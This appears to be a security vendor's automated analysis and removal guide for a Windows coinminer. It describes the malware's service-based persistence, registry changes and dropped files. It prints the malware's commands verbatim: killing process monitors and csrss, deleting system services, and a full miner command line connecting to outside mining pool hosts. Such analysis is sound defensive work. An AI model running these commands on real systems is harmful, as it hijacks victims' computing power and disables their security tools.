PLATFORM:

Windows

 OVERALL RISK RATING:
 DAMAGE POTENTIAL:
 REPORTED INFECTION:

  • Threat Type: Coinminer

  • Destructiveness: No

  • Encrypted:

  • In the wild: Yes

  OVERVIEW

This Coinminer arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.

  TECHNICAL DETAILS

File Size: 2,247,680 bytes
File Type: EXE
Memory Resident: Yes
Initial Samples Received Date: 21 Feb 2020

Arrival Details

This Coinminer arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.

Installation

This Coinminer adds the following processes:

  • cmd /c attrib -s -h -r -a %SystemRoot%\Fonts
  • net stop MicrosotMaims
  • sc delete MicrosotMaims
  • net stop MicrosotMais
  • sc delete MicrosotMais
  • net stop lanmanserver /y
  • sc config lanmanserver start= DISABLED 2>nul
  • sc delete lanmanserver
  • net stop mssecsvc2.0
  • sc delete mssecsvc2.0
  • net stop mssecsvc2.1
  • sc delete mssecsvc2.1
  • %Fonts%\svchost.exe install MicrosotMaims %Fonts%\conhost.exe
  • %Fonts%\svchost.exe set MicrosotMaims DisplayName Network Location Service
  • %Fonts%\svchost.exe set MicrosotMaims Description Provides performance library information from Windows Management.
  • %Fonts%\svchost.exe start MicrosotMaims
  • cmd /c %Windows%\TEMP\chost.bat
  • "%System%\WScript.exe" "%User Temp%\tem.vbs"
  • %User Temp%\tem.vbs
  • attrib -s -h -r -a %Fonts%
  • %System%\net1 stop MicrosotMaims
  • %System%\net1 stop MicrosotMais
  • %System%\net1 stop lanmanserver /y
  • %System%\net1 stop mssecsvc2.0
  • %System%\net1 stop mssecsvc2.1
  • reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor" /v "AutoRun" /f.
  • sc stop Workstation
  • sc delete Workstation
  • sc stop csrss
  • sc delete csrss
  • taskkill /f /im csrss.exe
  • %System%\Wbem\WMIC.exe wmic process where "name='LDE.exe' and ExecutablePath='%System Root%\ProgramData\WinTcpAutoProxySvc\LDE.exe'" call Terminate
  • %System%\Wbem\WMIC.exe wmic process where "name='taskmgr.exe' and ExecutablePath='%System Root%\Windows\Temp\locales\taskmgr.exe'" call Terminate
  • %System%\cmd.exe /S /D /c" echo y"
  • cacls %Windows%\Temp\locales\taskmgr.exe /d everyone
  • %Fonts%\svchost.exe
  • %System%\svchost.exe -k WerSvcGroup
  • %System%\svchost.exe -k DcomLaunch
  • "%Fonts%\conhost.exe"
  • cmd /c attrib +s +a %SystemRoot%\Fonts
  • cmd /c taskkill /im taskmgr.exe /f /T
  • cmd /c taskkill /im rundll32.exe /f /T
  • cmd /c taskkill /im autoruns.exe /f /T
  • cmd /c taskkill /im perfmon.exe /f /T
  • cmd /c taskkill /im procexp.exe /f /T
  • cmd /c taskkill /im ProcessHacker.exe /f /T
  • %Fonts%\svchost.exe install MicrosotMais d1lhots -o stratum+tcp://a.ccmd.website:1166 -u Bing -k --max-cpu-usage=50 --donate-level=1 -r3 --asm=AUTO --print-time=3 --nicehash -o stratum+tcp://b.ccmd.website:1188 -u Bing -k --max-cpu-usage=50 --donate-level=1 -r3 --asm=AUTO --print-time=3 --nicehash
  • %Fonts%\svchost.exe set MicrosotMais DisplayName WMI Performance Services
  • %Fonts%\svchost.exe set MicrosotMais Description Identify computers that are connected to the network, collect and store the properties of these networks, and notify the application when they are changed.
  • %Fonts%\svchost.exe start MicrosotMais
  • attrib +s +a %Fonts%
  • taskkill /im taskmgr.exe /f /T
  • taskkill /im rundll32.exe /f /T
  • taskkill /im autoruns.exe /f /T
  • taskkill /im perfmon.exe /f /T
  • taskkill /im procexp.exe /f /T
  • taskkill /im ProcessHacker.exe /f /T

(Note: %Fonts% is the Windows Fonts folder, which is usually C:\Window\Fonts on Windows 2000(32-bit), XP, Server 2003(32-bit), Vista, 7, 8, 8.1, 2008(64-bit), 2012(64-bit) and 10(64-bit).. %Windows% is the Windows folder, where it usually is C:\Windows on all Windows operating system versions.. %User Temp% is the current user's Temp folder, which is usually C:\Documents and Settings\{user name}\Local Settings\Temp on Windows 2000(32-bit), XP, and Server 2003(32-bit), or C:\Users\{user name}\AppData\Local\Temp on Windows Vista, 7, 8, 8.1, 2008(64-bit), 2012(64-bit) and 10(64-bit).. %System Root% is the Windows root folder, where it usually is C:\ on all Windows operating system versions.)

Autostart Technique

This Coinminer registers itself as a system service to ensure its automatic execution at every system startup by adding the following registry entries:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\
services\MicrosotMais
ImagePath = "%Fonts%\svchost.exe"

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\
Services\MicrosotMaims
ImagePath = "%Fonts%\svchost.exe"

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\
Services\MicrosotMais
ImagePath = "%Fonts%\svchost.exe"

Other System Modifications

This Coinminer deletes the following files:

  • %Windows%\LastGood.Tmp
  • {malware file path and name}

(Note: %Windows% is the Windows folder, where it usually is C:\Windows on all Windows operating system versions.)

It adds the following registry entries:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\
services\MicrosotMaims\Parameters
Application = "%Fonts%\conhost.exe"

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\
services\MicrosotMaims\Parameters
AppParameters = ""

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\
services\MicrosotMaims\Parameters
AppDirectory = "%Fonts%"

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\
services\MicrosotMaims\Parameters\
AppExit
(Default) = "Restart"

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\
services\MicrosotMaims
FailureActionsOnNonCrashFailures = "1"

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\
services\MicrosotMais
Type = "16"

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\
services\MicrosotMais
Start = "2"

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\
services\MicrosotMais
ErrorControl = "1"

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\
services\MicrosotMais
DisplayName = "MicrosotMais"

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\
services\MicrosotMais
ObjectName = "LocalSystem"

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\
services\MicrosotMais
DelayedAutostart = "0"

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\
services\MicrosotMais
FailureActionsOnNonCrashFailures = "1"

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\
services\MicrosotMais
Description = "{random characters}"

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\
services\MicrosotMais
DisplayName = "WMI Performance Services"

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\
services\eventlog\Application\
NSSM
EventMessageFile = "%Fonts%\svchost.exe"

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\
services\eventlog\Application\
NSSM
TypesSupported = "7"

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\
services\MicrosotMais\Parameters
Application = "d1lhots"

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\
services\MicrosotMais\Parameters
AppParameters = "{random characters}"

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\
services\MicrosotMais\Parameters
AppDirectory = ""

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\
services\MicrosotMais\Parameters\
AppExit
(Default) = "Restart"

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\
Services\MicrosotMaims
DisplayName = "MicrosotMaims"

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\
Services\MicrosotMaims
Start = "SERVICE_AUTO_START"

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\
Services\MicrosotMais
DisplayName = "MicrosotMais"

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\
Services\MicrosotMais
Start = "SERVICE_AUTO_START"

It modifies the following registry entries:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\
services\Browser
Type = "16"

(Note: The default value data of the said registry entry is 20.)

It deletes the following registry keys:

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\
services\MicrosotMais\DependOnService

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\
services\MicrosotMais\DependOnGroup

Dropping Routine

This Coinminer drops the following files:

  • %Fonts%\conhost.exe
  • %Fonts%\d1lhots.exe
  • %User Temp%\tem.vbs
  • %Windows%\Temp\chost.bat
  • %Fonts%\WinRing0x64.sys
  • %Fonts%\svchost.exe

(Note: %Fonts% is the Windows Fonts folder, which is usually C:\Window\Fonts on Windows 2000(32-bit), XP, Server 2003(32-bit), Vista, 7, 8, 8.1, 2008(64-bit), 2012(64-bit) and 10(64-bit).. %User Temp% is the current user's Temp folder, which is usually C:\Documents and Settings\{user name}\Local Settings\Temp on Windows 2000(32-bit), XP, and Server 2003(32-bit), or C:\Users\{user name}\AppData\Local\Temp on Windows Vista, 7, 8, 8.1, 2008(64-bit), 2012(64-bit) and 10(64-bit).. %Windows% is the Windows folder, where it usually is C:\Windows on all Windows operating system versions.)

Other Details

This Coinminer connects to the following possibly malicious URL:

  • http://a.{BLOCKED}d.website
  • {BLOCKED}101.172

This report is generated via an automated analysis system.

  SOLUTION

Minimum Scan Engine: 9.850

Step 1

Before doing any scans, Windows 7, Windows 8, Windows 8.1, and Windows 10 users must disable System Restore to allow full scanning of their computers.

Step 2

Identify and terminate files detected as Coinminer.Win32.MALXMR.TIAOODDK

[ Learn More ]
  1. Windows Task Manager may not display all running processes. In this case, please use a third-party process viewer, preferably Process Explorer, to terminate the malware/grayware/spyware file. You may download the said tool here.
  2. If the detected file is displayed in either Windows Task Manager or Process Explorer but you cannot delete it, restart your computer in safe mode. To do this, refer to this link for the complete steps.
  3. If the detected file is not displayed in either Windows Task Manager or Process Explorer, continue doing the next steps.

Step 3

Delete this registry value

[ Learn More ]

Important: Editing the Windows Registry incorrectly can lead to irreversible system malfunction. Please do this step only if you know how or you can ask assistance from your system administrator. Else, check this Microsoft article first before modifying your computer's registry.

  • In HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\MicrosotMaims\Parameters
    • Application = "%Fonts%\conhost.exe"
  • In HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\MicrosotMaims\Parameters
    • AppParameters = ""
  • In HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\MicrosotMaims\Parameters
    • AppDirectory = "%Fonts%"
  • In HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MicrosotMaims\Parameters\AppExit
    • (Default) = "Restart"
  • In HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\MicrosotMaims
    • FailureActionsOnNonCrashFailures = "1"
  • In HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\MicrosotMais
    • Type = "16"
  • In HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\MicrosotMais
    • Start = "2"
  • In HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\MicrosotMais
    • ErrorControl = "1"
  • In HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\MicrosotMais
    • DisplayName = "MicrosotMais"
  • In HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\MicrosotMais
    • ObjectName = "LocalSystem"
  • In HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\MicrosotMais
    • DelayedAutostart = "0"
  • In HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\MicrosotMais
    • FailureActionsOnNonCrashFailures = "1"
  • In HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\MicrosotMais
    • Description = "{random characters}"
  • In HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\MicrosotMais
    • DisplayName = "WMI Performance Services"
  • In HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\eventlog\Application\NSSM
    • EventMessageFile = "%Fonts%\svchost.exe"
  • In HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\eventlog\Application\NSSM
    • TypesSupported = "7"
  • In HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\MicrosotMais\Parameters
    • Application = "d1lhots"
  • In HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\MicrosotMais\Parameters
    • AppParameters = "{random characters}"
  • In HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\MicrosotMais\Parameters
    • AppDirectory = ""
  • In HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MicrosotMais\Parameters\AppExit
    • (Default) = "Restart"
  • In HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MicrosotMaims
    • DisplayName = "MicrosotMaims"
  • In HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MicrosotMaims
    • Start = "SERVICE_AUTO_START"
  • In HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MicrosotMais
    • DisplayName = "MicrosotMais"
  • In HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MicrosotMais
    • Start = "SERVICE_AUTO_START"

Step 4

Restore these modified registry values

[ Learn More ]

Important:Editing the Windows Registry incorrectly can lead to irreversible system malfunction. Please do this only if you know how to or you can seek your system administrator's help. You may also check out this Microsoft article first before modifying your computer's registry.

  • In HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Browser
    • From: Type = "16"
      To: Type = ""20""

Step 5

Search and delete these components

[ Learn More ]
There may be some components that are hidden. Please make sure you check the Search Hidden Files and Folders checkbox in the "More advanced options" option to include all hidden files and folders in the search result.
  • %Fonts%\conhost.exe
  • %Fonts%\d1lhots.exe
  • %User Temp%\tem.vbs
  • %Windows%\Temp\chost.bat
  • %Fonts%\WinRing0x64.sys
  • %Fonts%\svchost.exe

Step 6

Scan your computer with your Trend Micro product to delete files detected as Coinminer.Win32.MALXMR.TIAOODDK. If the detected files have already been cleaned, deleted, or quarantined by your Trend Micro product, no further step is required. You may opt to simply delete the quarantined files. Please check the following Trend Micro Support pages for more information:

Step 7

Restore this file from backup only Microsoft-related files will be restored. If this malware/grayware also deleted files related to programs that are not from Microsoft, please reinstall those programs on you computer again.

  • %Windows%\LastGood.Tmp
  • {malware file path and name}

Step 8

Restore these deleted registry keys/values from backup

*Note: Only Microsoft-related keys/values will be restored. If the malware/grayware also deleted registry keys/values related to programs that are not from Microsoft, please reinstall those programs on your computer.

  • In HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MicrosotMais
    • DependOnService
  • In HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MicrosotMais
    • DependOnGroup


Did this description help? Tell us how we did.